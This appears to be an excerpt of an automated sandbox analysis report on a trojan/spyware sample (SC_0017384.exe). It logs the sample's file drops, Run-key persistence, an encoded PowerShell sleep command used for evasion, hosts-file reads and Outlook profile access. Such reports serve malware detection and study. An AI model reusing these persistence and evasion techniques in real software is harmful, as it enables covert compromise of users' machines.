          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe" Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeFile created: C:\Users\user\AppData\Roaming\JqtuyobJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgjipv3a.uw1.ps1Jump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@26/13@11/7
          Source: C:\Users\user\Desktop\SC_0017384.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: SC_0017384.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\SC_0017384.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:472:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_01
          Source: C:\Users\user\Desktop\SC_0017384.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\SC_0017384.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: SC_0017384.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SC_0017384.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: SC_0017384.exe, 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.381474937.000000000140D000.00000004.00000020.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.383573088.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000051DF000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.433202218.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000003.430554668.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, Lvdnyvcvr.exe, 0000000E.00000002.548095343.0000000001520000.00000040.00001000.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000010.00000002.567296609.00000000013B0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: SC_0017384.exe, SC_0017384.exe, 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.381474937.000000000140D000.00000004.00000020.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.383573088.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000051DF000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.433202218.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000003.430554668.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, Lvdnyvcvr.exe, 0000000E.00000002.548095343.0000000001520000.00000040.00001000.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000010.00000002.567296609.00000000013B0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0041AB65 pushad ; retf 3_2_0041AB6A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0040DCD0 push ebp; retf 3_2_0040DC71
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0041A5D7 push es; iretd 3_2_0041A5F6
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_00422DFB push dword ptr [DF27AEF3h]; ret 3_2_00422E85
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_00401D80 push eax; ret 3_2_00401D82
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_00406D88 pushfd ; ret 3_2_00406D8C
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_004055AA push esp; ret 3_2_004055AD
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0041B612 push edi; ret 3_2_0041B61B
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_004116DF pushfd ; retf 3_2_004116E6
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017BD0D1 push ecx; ret 3_2_017BD0E4
          Source: C:\Users\user\Desktop\SC_0017384.exeFile created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeJump to dropped file
          Source: C:\Users\user\Desktop\SC_0017384.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run LvdnyvcvrJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run LvdnyvcvrJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
